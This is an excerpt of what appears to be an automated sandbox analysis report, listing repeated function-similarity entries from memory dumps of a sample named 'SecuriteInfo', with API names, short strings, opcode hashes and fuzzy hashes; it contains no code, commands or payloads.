                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2227656907-0
                                                                                                                                                                                                                                                            • Opcode ID: 18153d3bacff35197e7a12e87e099423dfee31ad9b8f95cd6c78971f36698885
                                                                                                                                                                                                                                                            • Instruction ID: 22636d131978b6f98b788ad6f4832b1aaf617010433b8938b721feb6e2cb3541
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 18153d3bacff35197e7a12e87e099423dfee31ad9b8f95cd6c78971f36698885
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C5B1B122B1969341FB60EB25DC10DB9E2B0EF44BE4F844171EA4D17B85DE3CE54A8B20
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2933794660-0
                                                                                                                                                                                                                                                            • Opcode ID: c9256d3c29dec7defdbd069e132950cc3752c5933af8d37e6b370c711f310d19
                                                                                                                                                                                                                                                            • Instruction ID: ba9e22b727f314fdde2ac56eaf13c21939d1f1d456cd85bd7b912e0866b62b94
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c9256d3c29dec7defdbd069e132950cc3752c5933af8d37e6b370c711f310d19
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 96114C22B14F028AFB00EF60EC44AB873B4FB18758F841E31DA6D427A4EF38D1558790
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: memcpy_s
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1502251526-0
                                                                                                                                                                                                                                                            • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                                            • Instruction ID: e54f1f928882970061d35e95b7dec57d63fdefbc8797c0a6ba99a689eaf8d7c7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0C1F772B186868BE724DF15A844E6AF7A1FB84784F858134DB4E47B44DB3DE902CB40
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 15204871-0
                                                                                                                                                                                                                                                            • Opcode ID: 48b97647827edafc3b78799631f3641f64fd5a0bbb932a3008f366d071470ff1
                                                                                                                                                                                                                                                            • Instruction ID: 8ca1488da99d5c1686e771c1baac0ca71f0501f71ad18b42a2aa12f4640da695
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 48b97647827edafc3b78799631f3641f64fd5a0bbb932a3008f366d071470ff1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D3B15C77600B868AEB15CF29CC86768B7B0FB44B48F55C862DA5E837A4CB39D553CB10
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: $
                                                                                                                                                                                                                                                            • API String ID: 0-227171996
                                                                                                                                                                                                                                                            • Opcode ID: 92ab44aa671049a5d726c4e1cd9e81523bdb76ab1b5bae976e988b650b47c5f7
                                                                                                                                                                                                                                                            • Instruction ID: 4b1cc464fe6457828bb1b080ce2da0e33811da16b4536f56a565c88f1e56d801
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 92ab44aa671049a5d726c4e1cd9e81523bdb76ab1b5bae976e988b650b47c5f7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 40E1C636A086468BFB68EF25C85093DA7B0FF55B48F940275DA4E07794EF29E853CB10
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: e+000$gfff
                                                                                                                                                                                                                                                            • API String ID: 0-3030954782
                                                                                                                                                                                                                                                            • Opcode ID: 414bc82e88e4b1ba2530bd57a0790f599c7f8d835f00ab403542f9b81ab3ad6c
                                                                                                                                                                                                                                                            • Instruction ID: 3f6acea16dd75ad8a82258de0863e4fd615318961b1360259ad39db4351346ac
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 414bc82e88e4b1ba2530bd57a0790f599c7f8d835f00ab403542f9b81ab3ad6c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DD515762B182C58AF7359E359C05B69ABA1FF44B94F88C271CB984BAC5CE3DD4468F10
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1010374628-0
                                                                                                                                                                                                                                                            • Opcode ID: daa1868950d22527141b3bb5e52a58b64e58f1e29eb8866760703242d5ff76be
                                                                                                                                                                                                                                                            • Instruction ID: 1a605ec92eb46ef39db0a6c428dc0160be5ce497c738a2628e4194de990c08c3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: daa1868950d22527141b3bb5e52a58b64e58f1e29eb8866760703242d5ff76be
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2F02B021B0964344FBA1BB219C01E79E6B4EF41BA0FD845B5DE5D463D2DE3DA90B8B20
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: gfffffff
                                                                                                                                                                                                                                                            • API String ID: 0-1523873471
                                                                                                                                                                                                                                                            • Opcode ID: bb93477e02d4e941dcb5b3cdf68f9d2c091b313a0377ba104bac55ee011317e1
                                                                                                                                                                                                                                                            • Instruction ID: 097f8a345e2bb7f747c7fc7c99f973df08d797cb4e41364e48a2c5214a4e4f20
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bb93477e02d4e941dcb5b3cdf68f9d2c091b313a0377ba104bac55ee011317e1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4FA10362B087868AFB31DF25A800BADBBA1EF50B84F458172DA8D47795DE3DD502CF11
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID: TMP
                                                                                                                                                                                                                                                            • API String ID: 3215553584-3125297090
                                                                                                                                                                                                                                                            • Opcode ID: f418ac5b73ce95224f4cdc4c7ad8bddcd0a3b001ad5768b3b557a0f5eb967220
                                                                                                                                                                                                                                                            • Instruction ID: 3e0bae8071cd99315c064095bc5ea7d2f1e0d63a4f69758a09c927561f5bfeaa
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f418ac5b73ce95224f4cdc4c7ad8bddcd0a3b001ad5768b3b557a0f5eb967220
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7151AC15B0920349FB64BA269D0197AD2F1EF58BC4FC844B6DE0D47796EE3CE4178A20
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: HeapProcess
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 54951025-0
                                                                                                                                                                                                                                                            • Opcode ID: 9cb1cd12b35fa318c4a8e0929622bdae7cba3dd6c324a68b4e8dcf83c52a71e5
                                                                                                                                                                                                                                                            • Instruction ID: 6ed5923f773ad1e5c5ebf8d7ccdcc1d3123a054fe51b838e8c0b12d07d94a64d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9cb1cd12b35fa318c4a8e0929622bdae7cba3dd6c324a68b4e8dcf83c52a71e5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C0B09220E07B02CAFB083B116C82A14A2B4BF58710FE444B9C10C81330DF3C25BA4B21
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: b1c086197733176920e670542d9d571295f110a1a04111a447b2e9bf7cf9f205
                                                                                                                                                                                                                                                            • Instruction ID: 3af0a7d1265c763153ca8844d57ed63aa150af2b1e1a15b1f45931035bd0253a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b1c086197733176920e670542d9d571295f110a1a04111a447b2e9bf7cf9f205
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 40D1D632A086428AFB68AE258950A7DA7B0FF45B48F9445F5CE0D07695DF3DD843CB70
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: e5e7c7d6f5738ce9ae6dae89df256b28c6339b9d8c2370fd2cf9ecf49eca8280
                                                                                                                                                                                                                                                            • Instruction ID: 8448f5b2aed10bab10719ce6f258dcd3b3dc3b46672864d2119920bcc60dbbd0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e5e7c7d6f5738ce9ae6dae89df256b28c6339b9d8c2370fd2cf9ecf49eca8280
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 82C186721241E18BD2D9EB39E85947EB7A1FB88349FC4413AEB8747B85C63CE116DB10
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 7c9ed06f36b3d533f088c72f27e683e59507fd20484e083b1e58df30cf10ceb8
                                                                                                                                                                                                                                                            • Instruction ID: 32928196fc4fb7a65b8535dacaf90f9b1e9b30ed18f3b519345f6053745118cd
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7c9ed06f36b3d533f088c72f27e683e59507fd20484e083b1e58df30cf10ceb8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1AB14A7290878589FB65AF29C85462DBBB0EF45F48FA441B9CA4E47395CF3AD442CB30
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 0e5c34987f7a9ca6c6679c1ebbd58ec90466e7178802fc144f73f7d44e403847
                                                                                                                                                                                                                                                            • Instruction ID: 410e648b0e54fb6f9056e32662bfc7ed2d4ab9d75c7fc89ae3395354fc92ad97
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0e5c34987f7a9ca6c6679c1ebbd58ec90466e7178802fc144f73f7d44e403847
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC81E572A0C7824AF774DB299840B6EEAA1FF85794F904276DB9D43B95DE3CD4018F10
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                                            • Opcode ID: a701ed251209d71644fd3cfab30fd42ccfd9d0bb1663ab03b4bd354a28a416a6
